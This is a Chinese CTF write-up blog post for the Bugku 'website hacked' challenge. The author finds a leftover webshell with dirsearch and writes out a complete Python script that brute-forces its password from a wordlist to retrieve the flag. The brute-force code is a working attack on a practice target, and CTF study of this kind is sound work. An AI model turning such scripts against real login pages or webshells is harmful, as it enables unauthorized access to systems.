Bugku网站被黑-ctf练习

3 篇文章 0 订阅
3 篇文章 0 订阅

记录一下一道简单但是自己尽量的不借助工具创造工具解决的一道题,好像大家都是用御剑解决的,但是macOS下是没有这个软件的,所以这里也提供一个mac下的解决方法

题目描述

网站被黑了 黑客会不会留下后门
在这里插入图片描述

需要的工具

1.dirsearch
直接github下载就可,20M且在命令行使用非常方便
安装包下载地址:https://github.com/maurosoria/dirsearch
2.python3.6以上版本(版本要求是为了使用dirsearch)

首先分析一波

在这里插入图片描述
很嚣张,获得webshell以后还留了一句话,结合题目描述我们知道应该是留下了后门。

然后破解一波

那么开始寻找后门入口,这里照顾macos玩家,终端运行dirsearch进行目录检测
在这里插入图片描述
在这里插入图片描述
检测结果如图,根据状态码200是我们可以访问的,那么index.php和shell.php我们试一下发现shell.php是留下的后门
访问http://114.67.246.176:10961/shell.php得到如下
在这里插入图片描述
查看源码没有得到有用信息,那么我们尝试密码爆破,虚拟机卡爆了,macos上又没有安装burpsuite,那么我们手动开荒,自己写一个爆破。
先随便输入一个密码admin在这里插入图片描述
发现下面出现一行字,那么如果密码正确,也许在相同地方会出现flag值,所以结合爬虫写出我们的爆破代码如下:

import requests
from lxml import etree
url="http://114.67.246.176:10961/shell.php"
data={'pass':'1'}
myhead={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0',
    'Cookie': 'PHPSESSID=lkidk2engpm5hmvjg61oo9rja0',
    'Origin': 'http://114.67.246.176:10961',
    'Referer': 'http://114.67.246.176:10961/shell.php'
}
with open('shellpass.txt','r') as f:
    passlist=f.readlines()
    for each in passlist:
        each=each.strip('\n')
        data={'pass':each}
        html=requests.post(url=url,headers=myhead,data=data).text
        myparser = etree.HTMLParser(encoding="utf-8")
        tree=etree.HTML(html,parser=myparser)
        target=tree.xpath('//span/text()')
        flag=target[0]
        if(flag!='\n\t\t\t\t\t*ä¸\x8dæ\x98¯è\x87ªå·±ç\x9a\x84马ä¸\x8dè¦\x81ä¹±éª\x91ï¼\x81*\t\t\t\t\t'):
            print(flag)
            break

在这里插入图片描述
运行结果如图,flag值果然在这里,复制提交就结束了这道题,虽然题目简单,但是自己的解法为了方便一下mac用户,并且给出了不同的解法,看大家好像都是用御剑破解然后burp爆破。

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值